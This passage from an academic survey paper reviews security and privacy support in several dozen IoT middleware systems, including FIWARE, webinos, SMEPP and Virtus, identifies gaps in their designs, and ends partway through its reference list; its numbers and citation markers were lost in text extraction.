has been defined as computer software that has an intermediary function between the various applications of a computer and its operating system [ ]. in our case, we are interested in middleware that is specifically designed or adapted to provide capabilities for iot networks. there are a number of existing surveys of iot middleware. bandyopadhyay et al. [ , ] review a number of middleware systems designed for iot systems. while they look at security in passing, there is no detailed analysis of the security of each middleware system. [ ] calls out the need for security, but no analysis of the approaches or existing capabilities is provided. [ ] is a very broad survey paper that addresses iot middleware loosely. [ ] is another wide-ranging survey of iot middleware that provides a simple analysis of whether the surveyed systems have any support for security or privacy, but does not address detailed requirements. it is clear then, that a detailed evaluation of security in iot middleware is a useful contribution to the literature. we therefore identified a set of middleware systems to study. . middleware review methodology this set was identified through a combination of the existing literature reviews on iot middleware [ , , ] together with our own search for middleware systems that explicitly target iot scenarios. some of the systems that were included in these papers we excluded from our list on the basis that they were not middleware. for example, [ ] lists tinyrest [ ] as a middleware, but in fact we considered this paper to be the definition of a standard protocol and therefore we excluded it. our search strategy was to use a search for the terms (”iot” or ”internet of things”) and ”mid- dleware”. we searched only in the subject terms and restricted the search to academic papers written in english. the search was carried out by the portsmouth university discovery system which is a metasearch engine. the list of databases that are searched is available at [ ]. the search was originally issued on june th, , identifying papers. it was repeated on december st, , and papers were identified, showing a significant growth in iot middleware papers over the intervening period. we then manually reviewed the abstracts of the papers to identify a list of functioning middleware systems as opposed to papers that describe other aspects of iot without describing a middleware system. this produced a list of middleware systems. in our study, we looked for the security and privacy requirements listed in section . we also identified if the middleware had a clearly defined security model and/or security implementation. out of the middleware systems identified, we found that had no published discussion or architecture for security, or such a minimal description that we were not able to identify any support for the selected security requirements. we label these as non-secured systems. . non-secured systems we provide a brief description of each of the non-secure middleware systems: asip the arduino service interface programming model (asip) [ ] is a middleware for arduino hardware. aspire aspire project (advanced sensors and lightweight programmable middleware for innova- tive rfid enterprise applications) [ ] is a eu-funded project that created an open, royalty-free middleware for rfid-based applications. autonomic qos management [ ] offers a middleware that autonomically manages quality of service (qos) in iot scenarios. while this does address some aspects related to security (i.e. accuracy and availability), there is no discussion of how security is handled. cascom in [ ] a semantically-driven configuration model is built on top of existing middleware systems such as gsn [ ]. the authors state their intention of addressing privacy in future work. / cirus cirus [ ] is a cloud-based middleware for ubiquitous analytics of iot data. cloud-based car parking middleware in [ ] the authors describe an osgi-based middleware for smart cities enabling iot-based car parking. context aware gateway [ ] provides a reference architecture for using context-awareness in iot sce- narios. the middleware itself does not address security or privacy and the authors plan to address this in further work. damp in [ ] there is a middleware – distributed applications management platform – that can configure systems based on quality of service characteristics (qos). these characteristics can include security, but the system itself does not offer any security model. dioptase dioptase [ ] is a restful stream-processing middleware for iot. dioptase does address one useful aspect for privacy: intermediate stream processing of data, summarisation and filtering. however, there is no detailed security architecture and description and the security model is left as an item of future work. edbo [ ] describes the emergent distributed bio-organization: a biologically-inspired platform for self-organising iot systems. edsoa an event-driven service-oriented architecture for the internet of things service execu- tion [ ] describes an approach that utilizes an event-driven soa. emma the environmental monitoring and management agent (emma) is a proposed middleware based on coap [ ]. it does not offer any security architecture. gsn the gsn framework [ ] (global sensor networks) defines a middleware for the internet of things that requires little or no programming. the security architecture of the system is not described in any detail: there are diagrams of the container architecture which point to proposed places for access control and integrity checks, but unfortunately there is not sufficient discussion to be able to categorize or evaluate the approach taken. hi-speed usb middleware [ ] offers a middleware based on usb. hitch hiker hitch hiker . [ ] is a prototype middleware environment built on contiki os. lmts in [ ] a middleware system for asset tracking (laptop management and tracking system) is described. middleware for environmental monitoring and control [ ] defines a middleware for environmen- tal monitoring and control. middleware for industrial iot [ ] describes a middleware for industrial iot based on opendds, which is a middleware that implements the data distributions services (dds) protocol. at the time of writing the dds security model was in development and hence the architecture does not address security. mifim middleware for future internet models (mifim) [ ] is a web service-based architecture that uses aspect-orientation to allow for simpler reconfiguration. mosden mosden (mobile sensor data processing engine) [ ] is an extension of the gsn ap- proach (see above) which is explicitly targeted at opportunistic sensing from restricted devices. m-hub [ ] describes a middleware for mobile iot applications built on top of another middleware (scalable data distribution layer). in [ ] this work is enhanced to create a middleware for ambient assisted living. in [ ] there is another middleware based on m-hub. there is no support for security or privacy described. palcom palcom [ ] is a middleware designed for pervasive computing, including iot systems. it supports ad-hoc composition of services. there is no discussion of security beyond a statement that traditional security models may be added in future. / pobicos platform for opportunistic behaviour in incompletely specified, heterogeneous object communities (pobicos) [ ] is a device middleware designed to run on small devices. in [ ] there is a description of migrating aspects of the middleware to a proxy to enable support for smaller devices. proteus proteus is a process manager designed to support cyber-physical systems [ ]. it describes a middleware for complex self-healing processes. remoteu¡ [ ] offers a middleware for remote user interfaces. sbiotcm in a soa based iot communication middleware [ ] is a middleware based on soap and ws. there is no security model described. service oriented access for wireless sensor networks [ ] provides a service-oriented middleware for iot and wireless sensor network data. smart object middleware [ ] describes a smart object middleware based on java. symbiote in [ ] a roadmap is laid out for a new eu funded project to allow vertical iot platforms to interoperate and federate. there is no plan for security presented. thingsonomy thingsonomy [ ] is an event-based publish-subscribe based approach that applies se- mantic technology and semantic matching to the events published within the system. ubiroad the ubiroad middleware [ ] is a specialization of the ubiware project specifically targeting traffic, road management, transport management and related use-cases. ubisoap ubisoap [ ] is a service-oriented architecture (soa) approach that builds a middleware for ubiquitous computing and iot based on the web services (ws) standards and the soap protocol. veot [ ] describes a virtual environment of things which is a middleware for virtual reality engage- ment with the internet of things. wherex wherex [ ] is an event-based middleware for the iot. secured systems we identified middleware systems that implement or describe sufficient security architecture that we could evaluate them against the requirements that were identified in section . we describe these systems as secured. in addition to the requirements identified above, we also identified whether the systems had explicit support or adaptation for iot specific protocols: mqtt, coap, dds, bluetooth or zigbee. as discussed above, in section , these protocols have been specifically designed for low-power devices. we label this requirement req . table shows the summary of this analysis. for each of the secured middleware system we looked at the core published papers and also examined any further available documentation. below are the specific details of each middleware system. . &cube in [ ] they describe a middleware, &cube, that is designed to offer restful apis as well as mqtt connections to integrate with iot devices. the system offers a security manager providing encryption, authentication and access control. no further details are available on the techniques used. . device cloud in [ ] there is a blueprint for a middleware that applies cloud computing concepts to iot device middleware. a more detailed exposition is given in [ ]. the approach supports oauth . to provide tokens to devices. it also supports encryption and access control. there is no support for summarisation, filtering, or consent-based access control described in the publications. / r e q - in te g ri ty a n d c o n fi d e n ti a li ty ! r e q - a c c e ss c o n tr o l! r e q . - c o n se n t! r e q . - p o li c y - b a se d s e c u ri ty ! r e q - a u th e n ti c a ti o n ! r e q . - f e d e ra te d id e n ti ty ! r e q . - s e c u re d e v ic e i d e n ti ty ! r e q . - a n o n y m o u s id e n ti ti e s! r e q - a tt e st a ti o n ! r e q - s u m m a ri sa ti o n a n d f il te ri n g ! r e q - c o n te x t- b a se d s e c u ri ty / r e p u ta ti o n ! r e q - io t -s p e c ifi c p ro to c o l s u p p o rt ! &cube ! y! y! y! y! device cloud! y! y! y! y! y! y! drems! y! y! y! y! droplock! y! y! y! y! y! fiware ! y! y! y! y! y! y! y! hydra/linksmart! y! y! y! y! income ! y! y! y! y! y! iot-mp ! y! y! nerd ! y! y! y! nos ! y! y! y! y! y! openiot! y! y! sensoract! y! y! sirena ! y! y! smepp ! y! y! y! socrades! y! y! y! ubiware ! y! webinos ! y! y! y! y! y! y! xmpp ! y! y! y! y! virtus ! y! y! y! y! table . summary of reviewed middleware systems and major properties . drems distributed realtime managed systems (drems) [ ] is a combination of software tooling and a middleware runtime for iot. it includes linux operating system extensions as well. drems is based on an actor [ ] model has a well-defined security model that extends to the operating system. the security model includes the concept of multi-level security (mls) for communications between a device and the actor. the mls model is based on labelled communications. this ensures that data can only flow to systems that have a higher clearance than the data being transmitted. this is a very powerful security model for government and military use-cases. however, this approach does not address needs-based access control. for example, someone with top secret clearance may read data that is categorised as secret even if they have no business reason to utilise that data. the weaknesses of this model have been shown with situations such as the snowden revelations. . droplock in [ ] the authors describe a middleware specifically built for iot systems and smart cities. the droplock system is designed to enable secure smartphone access to a smart locker, allowing delivery personnel secure access to drop off packages. the system uses secure tokens to allow access to devices. the tokens are passed to the secure locker using bluetooth. . fiware fiware [ ] is a middleware designed to be the basis of a future internet, sponsored by the european union under the fp programme. fiware is one of the few systems that claim to have used pbd as a basis for design [ ]. fiware has a concept of plugins, known as generic enablers (ge). the security model is implemented through ges including the identity management (idm ge), the authorization policy decision point (pdp) ge, and the policy enforcement point (pep) proxy. the standard approach within fiware is based on oauth and xacml. it also supports interoperable standards for exchanging identities with other systems. the overall security design of fiware fits into modern authentication and authorization models. iot devices are catered for in the fiware architecture through a gateway model. the iot devices connect to the gateway using iot specific protocols. the gateway is part of the iot edge. this communicates via the standard fiware protocols into an iot backend where there / are components supporting device management and discovery. the fiware documentation does not describe any specific adaptation of security or support for security between devices and the gateway. . hydra / linksmart hydra [ ] was a european union funded project which has since been extended and renamed as linksmart. the hydra team published a detailed theoretical model of a policy-based security approach [ ]. this model is based on using lattices to define the flow of information through a system. this model provides a language-based approach to security modelling. however, whilst this paper is published as part of the hydra funded project, there is no clear implementation of this in the context of iot or description of how this work can benefit the iot world. hoever, because hydra / linksmart is an open source project [ ] with documentation beyond the scientific papers, it is possible to understand the security model in greater detail by review of this project. the hydra and linksmart architectures are both based on the web services (ws) specifications, building on the soap protocol [ ], which in turn builds on the xml language [ ]. the security model is described in some detail in the linksmart documentation [ ]. the model utilises xml security [ ]. there are significant challenges in using this model in the iot world, as discussed above in section . the hydra/linksmart approach also uses symmetric keys for security which is a challenge for iot because each key must be uniquely created, distributed and updated upon expiry into each device creating a major key management issue. hydra / linksmart offers a service called the trustmanager. this is a system that uses the cryptographic capabilities to support a trusted identity for iot devices. this works with a public key infrastructure (pki) and certificates to ensure trust. once again there are challenges in the distribution and management of the certificates to the devices which are not addressed in this middleware. the hydra middleware does not offer any policy based access control for iot data, and does not address the secure storage of data for users, nor offer any user-controlled models of access control to user’s data. in [ ] there is a specific instantiation of linksmart applied to energy efficiency in buildings. there is no further extension to the security model. . income income [ ] is a framework for multi-scale context management for the iot, funded by the french national research agency. the aim of income is to fuse together context data from multiple levels to provide a high-level set of context data from iot systems that can be applied to decision making, including trust, privacy and security decisions. mudebs and mucontext [ ] are frameworks built on top of income that add attribute based access control (abac) and quality of context (qoc) processing. mudebs utilises xacml policies to implement abac. mucontext validates qoc and enables privacy filtering. . iot-mp the iot management platform (iot-mp) is a middleware system described in [ ]. iot-mp offers a security module that implements attribute-based access control (abac) against systems. iot-mp has a model whereby an agent is registered for each class of things, creating the concept of a managed thing. agents have unique secure identities. the iot-mp does not define how devices are identified to agents. . naps the naming, addressing and profile server (naps) [ ] describes a heterogeneous middleware for iot based on unifying data streams from multiple iot approaches. based on restful apis, the naps approach includes a key component handling authentication, authorization, and accounting (aaa). the design is based on the network security capability model defined in the etsi m m architecture [ ]. however, the main details of the security architecture have not yet been implemented and have been left for future work. there is no consideration of federated identity or policy based access control. . nerd no effort rapid development (nerd) [ ] is a middleware designed for human iot interfaces, especially around bluetooth le systems and ibeacon discovery. it does not add any new security measures but uses the existing security models in bluetooth and http. / . nos networked smart objects (nos) [ , ] takes an interesting approach to security where the aim is to provide each item of data with a reputational score based on a quality analyser and a security analyser. a machine learning algorithm is used to learn the behaviour of systems in the network and adjust the scores based on the potential attacks and the applied countermeasures. the system incorporates keys and key-based authentication, encryption and complex passwords. . openiot openiot is an open cloud-based middleware for the internet of things, funded by the european union fp programme. it also extends the gsn framework. the security module uses oauth as the main authentication and authorization model for web-based systems. no details are given of how sensors are authenticated or authorized. . sensoract sensoract [ ] is an iot middleware specifically aimed at providing support for building management systems (bms). it supports fine-grained access control through the use of a rules engine to implement access control policies. no details are provided of the authentication models at the device level or the web interface. . sirena sirena (service infrastructure for real-time embedded networked devices) [ ] is a soap/ws-based middleware for iot and embedded devices. while there is little description of the security framework in sirena, it does show the use of the ws-security specification. as previously discussed, this approach is very heavyweight, has issues with key distribution, federated identity and access control. . smepp secure middleware for p p (smepp) [ ] is an iot middleware explicitly designed to be secure, especially dealing with challenges in the peer-to-peer model. smepp security is based around the concept of a group. when a peer attempts to join a group, the system relies on challenge-response security to implement mutual authentication. at this point the newly joined peer is issues a shared session key which is shared by all members of the group. smepp utilizes elliptic key cryptography to reduce the burden of the security encryption onto smaller devices. overall smepp has addressed security effectively for peer-to-peer groups, but assumes a wider pki infrastructure for managing the key model used within each group. in addition, there is no discussion of access control or federated identity models, which are important for iot scenarios. the model is that any member of the group can read data published to the group using the shared session key. . socrades socrades [ ] is a middleware specifically designed for manufacturing shop floors and other industrial environments. based on soap and the ws stack it utilizes the security models of the ws stack, in particular the ws-security standard for encryption and message integrity. there is no special support for federation, tokens or policy-based access control (instead relying on role-based access control). the resulting xml approach is very heavyweight for iot devices and costly in terms of network and power [ ]. in addition, the lack of explicit support for tokens and federated security and identity models creates a significant challenge in key distributions and centralized identity for this approach. . ubiware the ubiware project is a smart semantic middleware for ubiquitous computing [ ]. the security model for ubiware is not clearly described in the original paper, but an additional paper describes a model called smart ubiquitous resource privacy and security (surpas) [ ], which provides a security model for ubiware. ubiware is designed to utilize the semantic web constructs, and surpas utilises the same model of semantic web as the basis for the abstract and concrete security architectures that it proposes. the model is highly driven by policies and these can be stored and managed by external parties. in particular the surpas architecture is highly dynamic, allowing devices to take on board new roles or functions at runtime. while the surpas model describes a theoretical solution to the approach, there are few details on the concrete instantiation. for example, while the model defines a policy-based approach / to access control, there are no clearly defined policy languages chosen. there is no clear model of identity or federation, and there is no clear guidance on how to ensure that federated policies that are stored on external servers are protected and maintain integrity. the model does not address any edge computing approaches or filtering/summarisation of iot data. however, the overall approach of using ontologies and basing policies on those ontologies is very powerful. . webinos the webinos [ ] system has a well-thought through security architecture. the documentation explicitly discussed pbd. the webinos system is based around the core concept of devices being in the personal control of users and therefore having each user having a “personal zone” to protect. this is a more advanced concept but in the same vein as the protected sub-domains in virtus. in the webinos model, each user has a cloud instance - known as the personal zone hub (pzh) that supports their devices. the personal zone hub acts as a service to collect and offer access to data and capabilities of the user’s devices. the pzh acts as a certificate authority, issuing certificates to the devices that are used for mutual authentication using tls. user’s authenticate to the pzh using the openid protocol. on the device, a communications module known as the personal zone proxy (pzp) handles all communications with the pzh. the idea of the personal zone may have significant issues however, when a single device is used by many different people (for example, the in-car system in a taxi as opposed to a personal vehicle). these issues are not addressed in webinos, though they are called out in the lessons learnt. webinos utilizes policy-based access control modelled in the xacml [ ] language. the system pushes xacml policies out to devices to limit the spread of personal and contextual data. webinos addresses the issue of software modification using an attestation api, which can report whether the software running is the correct level. this requires the device to be utilising trusted platform module (tpm) hardware that can return attestation data. webinos also addresses the issue of using secure storage on devices where the device has such storage. while the webinos project does address many of the privacy concerns of users through the use of the personal zone hub, there is clearly further work that could be done. in particular the ability for users to define what data they share with other users or other systems using a protocol such as oauth [ ], and the ability to install filters or other anonymising or data reduction aggregators into the pzh are lacking. one other aspect of webinos that is worth drawing attention to is the reliance on a certain size of device: the pzp that is needed on the device is based on the node.js framework and therefore the device needs to be of a certain size (e.g. a -bit processor running a linux derivative or similar) to participate in webinos. . virtus the virtus middleware [ ] utilizes the core security features of the xmpp protocol to ensure security. this includes tunnelling communications over tls, authentication via sasl, and access control via xmpp’s built-in mechanisms. sasl is a flexible mechanism for authentication which supports a number of different systems including token-based approaches such as oauth or kerberos, username/password, or x. certificates. for client-to-server based communications, it is not clear from the description which of these methods is actually implemented within virtus. for server-to-server communications there is specified the use of sasl to ensure full server federation. while the virtus model does not describe the challenges of implementing a personal instance of middleware for single users or devices, there is a concept of edge computing described, where some interactions may happen within an edge domain (e.g. within a house) and lower security is required within that domain while higher security is expected when sharing that data outside. this model is fairly briefly described but provides an interesting approach. one challenge is that there are multiple assumptions to this: firstly, that security within the limited domain needs less security, when there may be attackers within that perimeter. secondly, that the open channel to the wider internet cannot be misused to attack the edge network. the ability to calculate, summarise and/or filter data from the edge network before sharing it is also not discussed except in very granular terms (e.g. some data are available, other data are not). . xmpp the paper [ ] describes how the xmpp architecture can be applied to the challenges of m m and hence the iot, together with a proof-of-concept approach. the system relies on the set of xmpp extensions / around publish/subscribe and the related xmpp security models to implement security. this includes tls for encryption, and access control models around publish-subscribe. there is also a discussion about leakage of information such as presence from devices. the proof-of-concept model did not include any federated identity models, but did utilize a one-time password (otp) model on top of xmpp to address the concepts such as temporary loans of devices. summary of iot middleware security in reviewing both the security and privacy challenges of the wider iot and a structured review of more than fifty middleware platforms, we have identified some key categories that can be applied across these areas. firstly, we identified the significant proportion of the systems that did not address security, left it for further work, or did not describe the security approach in any meaningful detail. there were other systems (such as ubiware and naps) that offer theoretical models but did not demonstrate any real-world implementation or concrete approach. the next clear category are those middlewares that apply the soap/web services model of security. this includes socrades, sirena, and hydra/linksmart. as we have discussed in the previous sections there are significant challenges in performance, memory footprint, processor power and usability of these approaches when used with the iot. two of the approaches delegate the model to the xmpp standards: virtus and xmpp [ , ]. xmpp also has the complexity of xml, but avoids the major performance overheads by using tls instead of xml encryption and xml security. in addition, recent work on xmpp using exi makes this approach more effective for iot. this finally leaves a few unique approaches, each of which brings their own unique benefits. drems is the only system to provide multi-level security based on the concept of security clearances. while this model is attractive to government and military circles (because of the classification systems used in those circles), we would argue that it fails in many regards for iot. in particular there are no personal controls, no concept of federated identity and no policy based access controls in this model. smepp offers a model based on public key infrastructures and shared session keys. we would argue this approach has a number of challenges scaling to the requirements of the iot. firstly, there are significant issues in key distribution and key revocation. secondly, this model creates a new form of perimeter - based on the concept of a shared session key. that means that if one device is compromised then the data and control of all the devices in that group are also compromised. only dioptase supports the concept of stream processing in the cloud, which we argue is a serious requirement for the iot. the requirement is to be able to filter, summarise and process streams of data from devices to support anonymisation and reduction of data leakage. fiware has a powerful and extensible model for authentication and access control, including support for federated identity and policy-based access control. finally, the we identified that the most advanced approach is that proposed by webinos. webinos utilizes some key technologies to provide a security and privacy model. firstly, this uses policy-based access control (xacml). the model does not however support user-guided access control mechanisms such as oauth or uma. webinos does support the use of federated identity tokens (openid), but only from users to the cloud, as opposed to devices to the cloud. we and others have proposed the model of using federated identity tokens from the device to the cloud in [ , , ]. the contribution of the webinos work with the largest potential impact is the concept of personal zone hub, which is a cloud service dedicated to a single user to handle the security and privacy requirements of that user. there is, however, further research around this area: the pzh model from webinos does not examine many of the challenges of how to implement the pzh in real life. for example, user registration, cloud hosting, and many other aspects need to be defined in more detail before the webinos pzh model is practicable for real world projects. in addition there are challenges using the pzh model with smaller devices, because of the requirement to use the pzp. . overall gaps in the middleware when we look at the requirements for security and privacy of the internet of things we can see there are some gaps that are not provided by any of the reviewed middleware systems. / • only two of the middleware systems explicitly applied the concept of pbd in designing a mid- dleware directly to support privacy, although webinos did exhibit many of the characteristics of a system that used this approach. • only two of the systems applied any concepts of context-based security or reputation to iot devices. • user consent was only supported in three of the systems. • none of the systems supported anonymous identities or attestation. • none of the systems satisfied all the requirements identified. discussion . contributions in this paper we have taken a two-phase approach to reviewing the available literature around the security and privacy of iot devices. in the first part we created a matrix of security challenges that applied the existing cia+ model to three distinct areas: device, network and cloud. this new model forms a clear contribution to the literature. in each of the cells of the matrix we identified threats, challenges and/or approaches, or in a few cells we identified that the challenges are not exacerbated by iot concerns. we further used spiekerman and cranor’s three layer privacy model to analyse the privacy requirements of iot. we used this analysis to identify seven major requirements and five subsidiary requirements. in the second part, we used a structured search approach to identity specific iot middleware frameworks and we analysed the security models of each of those. we utilised the twelve requirements from the first phase to validate the capabilities of each system. while there are existing surveys of iot middleware, none of them focussed on a detailed analysis of the security of the surveyed systems and therefore this has a clear contribution to the literature. . further work in our survey, we have identified some clear gaps. over half the surveyed systems had either no security or no substantive discussion of security. out of the surveyed systems we found very few that addressed a significant proportion of the major challenges that we identified in the first section. we found certain aspects that were identified in the first section that were not addressed by any of the surveyed systems. based on this we believe there is a significant opportunity to contribute to the research by creating a middleware for iot that addresses these gaps. • to define a model and architecture for iot middleware that is designed from the start to enable privacy and security (privacy by design). • secondly, to bring together the best practice into a single middleware that includes: federated identity (for users and devices), policy-based access control, user managed access to data, stream processing in the cloud. • thirdly, there is considerable work to be done to define a better model around the implementation challenges for the concept of a personal cloud service (e.g the webinos pzh). this includes the hosting model, bootstrapping, discovery and usage for smaller devices. • finally, creating a middleware system that applies context-based security and reputation to iot middleware. references [ ] abdul-rahman, a., and hailes, s. supporting trust in virtual communities. in hicss ’ : proceedings of the rd hawaii international conference on system sciences-volume (washington, dc, usa, ), ieee computer society. [ ] aberer, k., and hauswirth, m. middleware support for the” internet of things”. / [ ] aberer, k., and hauswirth, m. middleware support for the” internet of things”. [ ] adetoye, a. o., and badii, a. foundations and applications of security analysis. springer- verlag, berlin, heidelberg, , ch. a policy model for secure information flow, pp. – . [ ] agha, g. a. actors: a model of concurrent computation in distributed systems. tech. rep., dtic document, . [ ] agirre, a., parra, j., armentia, a., estévez, e., and marcos, m. qos aware middleware support for dynamically reconfigurable component based iot applications. international journal of distributed sensor networks ( ). [ ] alessi, m., giangreco, e., pinnella, m., pino, s., storelli, d., mainetti, l., mighali, v., and patrono, l. a web based virtual environment as a connection platform between people and iot. in computer and energy science (splitech), international multidisciplinary conference on ( ), ieee, pp. – . [ ] ali, m., nelson, j., shea, r., and freedman, m. j. blockstack: design and implementation of a global naming system with blockchains. last visited on , ( ). [ ] anand, p. enabling context-aware computing in internet of things using m m. in nanoelectronic and information systems (inis), ieee international symposium on ( ), ieee, pp. – . [ ] andersson, k., and szewczyk, p. insecurity by obscurity continues: are adsl router manuals putting end-users at risk. [ ] arcangeli, j.-p., bouzeghoub, a., camps, v., canut, m.-f., chabridon, s., conan, d., desprats, t., laborde, r., lavinal, e., leriche, s., et al. income–multi-scale context management for the internet of things. in international joint conference on ambient intelligence ( ), springer, pp. – . [ ] arduino. arduino. http://arduino.cc/, . [ ] arjunan, p., saha, m., choi, h., gulati, m., singh, a., singh, p., and srivastava, m. b. sensoract: a decentralized and scriptable middleware for smart energy buildings. in ubiquitous intelligence and computing and ieee th intl conf on autonomic and trusted computing and ieee th intl conf on scalable computing and communications and its associated workshops (uic-atc-scalcom), ieee th intl conf on ( ), ieee, pp. – . [ ] ashton, k. that ‘internet of things’ thing. rfid journal ( ), – . [ ] aspire, f. fp ict ip project advanced sensors and lightweight programmable middleware for innovative rfid enterprise applications (aspire), . [ ] atmel. master’s thesis, . [ ] atzori, l., iera, a., and morabito, g. the internet of things: a survey. computer networks , ( ), – . [ ] audet, f., and jennings, c. network address translation (nat) behavioral requirements for unicast udp. tech. rep., . [ ] augusto, a. b., and correia, m. e. an xmpp messaging infrastructure for a mobile held security identity wallet of personal and private dynamic identity attributes. proceedings of the xata ( ). [ ] augustyn, j., maślanka, p., and hamuda, g. hi-speed usb based middleware for integration of real-time systems with the cloud. international journal of distributed sensor networks ( ). [ ] aziz, b., fremantle, p., wei, r., and arenas, a. a utility-based reputation model for the internet of things. in ifip international information security and privacy conference ( ), springer, pp. – . [ ] balakrishnan, s. m., and sangaiah, a. k. mifim – middleware solution for service centric anomaly in future internet models. future generation computer systems ( ). [ ] ball, j. nsa stores metadata of millions of web users for up to a year, se- cret files show. http://www.theguardian.com/world/ /sep/ / nsa-americans-metadata-year-documents, . (visited on / / ). / [ ] bandyopadhyay, s., sengupta, m., maiti, s., and dutta, s. role of middleware for internet of things: a study. international journal of computer science & engineering survey (ijcses) , ( ), – . [ ] bandyopadhyay, s., sengupta, m., maiti, s., and dutta, s. a survey of middleware for internet of things. in recent trends in wireless and mobile networks. springer, , pp. – . [ ] banouar, y., reddad, s., diop, c., chassot, c., and zyane, a. monitoring solution for autonomic middleware-level qos management within iot systems. in computer systems and applications (aiccsa), ieee/acs th international conference of ( ), ieee, pp. – . [ ] baraniuk, c. ashley madison:‘suicides’ over website hack. bbc news ( ). [ ] barbon, g., margolis, m., palumbo, f., raimondi, f., and weldin, n. taking arduino to the internet of things: the asip programming model. computer communications ( ), – . [ ] benito, r. j. c., márquez, d. g., tron, p. p., castro, r. r., martín, n. s., and martín, j. l. s. smepp: a secure middleware for embedded p p. proceedings of ict-mobilesummit ( ). [ ] bernabe, j. b., hernández, j. l., moreno, m. v., and gomez, a. f. s. privacy-preserving security framework for a social-aware internet of things. in international conference on ubiquitous computing and ambient intelligence ( ), springer, pp. – . [ ] billet, b., and issarny, v. dioptase: a distributed data streaming middleware for the future web of things. journal of internet services and applications , ( ), – . [ ] binna, m. www.w .org/ /xmlsec/papers/c n performance evaluation thesis.pdf. http: //www.w .org/ /xmlsec/papers/c n \_performance\_evaluation\ _thesis.pdf, . (visited on / / ). [ ] bitcoin. system requirements. https://bitcoin.org/en/bitcoin-core/ features/requirements#system-requirements, . (accessed on / / ). [ ] bohn, h., bobek, a., and golatowski, f. sirena-service infrastructure for real-time embedded networked devices: a service oriented framework for different domains. in networking, international conference on systems and international conference on mobile communications and learning technologies, . icn/icons/mcl . international conference on ( ), ieee, pp. – . [ ] bojinov, h., michalevsky, y., nakibly, g., and boneh, d. mobile device identification via sensor fingerprinting. arxiv preprint arxiv: . ( ). [ ] botezatu, b. percent of wireless networks are highly vulnerable to hacking attacks, wi-fi security survey reveals — hotforsecurity. http://www.hotforsecurity.com/blog/ -percent-of-wireless-networks-are-highly-vulnerable-to-hacking-attacks-wi- html, . (visited on / / ). [ ] bray, t. e. a. extensible markup language (xml) . . recommendation, w c, february . available at http://www.w .org/tr/rec-xml. [ ] brickell, e., camenisch, j., and chen, l. direct anonymous attestation. in proceedings of the th acm conference on computer and communications security ( ), acm, pp. – . [ ] cam-winget, n., housley, r., wagner, d., and walker, j. security flaws in . data link protocols. communications of the acm , ( ), – . [ ] caporuscio, m., raverdy, p.-g., and issarny, v. ubisoap: a service-oriented middleware for ubiquitous networking. services computing, ieee transactions on , ( ), – . [ ] card, j. anonymity is the internet’s next big battleground. http://www.theguardian.com/media-network/ /jun/ / anonymity-internet-battleground-data-advertisers-marketers, . (visited on / / ). [ ] carvalho, m. a., and silva, j. n. poster: unified remoteu¡ for mobile environments. in proceedings of the st annual international conference on mobile computing and networking ( ), acm, pp. – . / [ ] cavoukian, a. privacy in the clouds. identity in the information society , ( ), – . [ ] chakravorty, r., cartwright, j., and pratt, i. practical experience with tcp over gprs. in global telecommunications conference, . globecom’ . ieee ( ), vol. , ieee, pp. – . [ ] chaqfeh, m., mohamed, n., et al. challenges in middleware solutions for the internet of things. in collaboration technologies and systems (cts), international conference on ( ), ieee, pp. – . [ ] chen, d., chang, g., sun, d., li, j., jia, j., and wang, x. trm-iot: a trust management model based on fuzzy reputation for internet of things. computer science and information systems , ( ), – . [ ] cirani, s., picone, m., gonizzi, p., veltri, l., and ferrari, g. iot-oas: an oauth-based authorization service architecture for secure services in iot scenarios. [ ] conzon, d., bolognesi, t., brizzi, p., lotito, a., tomasi, r., spirito, m., et al. the virtus middleware: an xmpp based architecture for secure iot communications. in computer communications and networks (icccn), st international conference on ( ), ieee, pp. – . [ ] conzon, d., bolognesi, t., brizzi, p., lotito, a., tomasi, r., spirito, m., et al. the virtus middleware: an xmpp based architecture for secure iot communications. in computer communications and networks (icccn), st international conference on ( ), ieee, pp. – . [ ] czauski, t., white, j., sun, y., turner, h., and eade, s. nerd – middleware for iot human machine interfaces. annals of telecommunications , - ( ), – . [ ] database, n. v. cve- - . https://web.nvd.nist.gov/view/vuln/detail? vulnid=cve- - , . (accessed on / / ). [ ] de souza, l. m. s., spiess, p., guinard, d., köhler, m., karnouskos, s., and savio, d. socrades: a web service based shop floor integration infrastructure. in the internet of things. springer, , pp. – . [ ] deitel, h. m. an introduction to operating systems, vol. . addison-wesley reading, mas- sachusetts, . [ ] desruelle, h., lyle, j., isenberg, s., and gielen, f. on the challenges of building a web- based ubiquitous application platform. in proceedings of the acm conference on ubiquitous computing ( ), acm, pp. – . [ ] dictionary, o. e. oxford english dictionary online. (accessed on / / ). [ ] dierks, t. the transport layer security (tls) protocol version . . [ ] douceur, j. r. the sybil attack. in international workshop on peer-to-peer systems ( ), springer, pp. – . [ ] dournaee, b., and dournee, b. xml security. mcgraw-hill, . [ ] duhart, c., sauvage, p., and bertelle, c. emma: a resource oriented framework for service choreography over wireless sensor and actor networks. arxiv preprint arxiv: . ( ). [ ] dunkels, a., et al. efficient application integration in ip-based sensor networks. in proceedings of the first acm workshop on embedded sensing systems for energy-efficiency in buildings ( ), acm, pp. – . [ ] eisenhauer, m., rosengren, p., and antolin, p. a development platform for integrat- ing wireless devices and sensors into ambient intelligence systems. in sensor, mesh and ad hoc communications and networks workshops, . secon workshops’ . th annual ieee communications society conference on ( ), ieee, pp. – . [ ] eleftherakis, g., pappas, d., lagkas, t., rousis, k., and paunovski, o. architecting the iot paradigm: a middleware for autonomous distributed sensor networks. international journal of distributed sensor networks , ( ), . / [ ] elkhodr, m., shahrestani, s., and cheung, h. a middleware for the internet of things. arxiv preprint arxiv: . ( ). [ ] et al, t. authentication and authorization for constrained environments using oauth and uma. [ ] etsi. etsi - m m. http://www.etsi.org/technologies-clusters/ technologies/m m, . (visited on / / ). [ ] evans, d. the internet of things. how the next evolution of the internet is changing everything, whitepaper, cisco internet business solutions group (ibsg) ( ). [ ] fitbit. fitbit official site for activity trackers & more. http://www.fitbit.com/, . (visited on / / ). [ ] fremantle, p. using oauth . with mqtt. http://pzf.fremantle.org/ / / using-oauth- -with-mqtt.html, . (accessed on / / ). [ ] fremantle, p., and aziz, b. oauthing: privacy-enhancing federation for the internet of things. in proceedings of the nd international conference on the cloudification of the internet of things ( ), ieee. [ ] fremantle, p., aziz, b., scott, p., and kopecký, j. federated identity and access management for the internet of things. in rd international workshop on the secure iot ( ). [ ] fremantle, p., kopecký, j., and aziz, b. web api management meets the internet of things. springer international publishing, cham, , pp. – . [ ] fronimos, t., lalis, s., koutsoubelias, m., and bartzanas, t. unified service-oriented access for wsns and dynamically deployed application tasks. in internet-of-things design and implementation (iotdi), 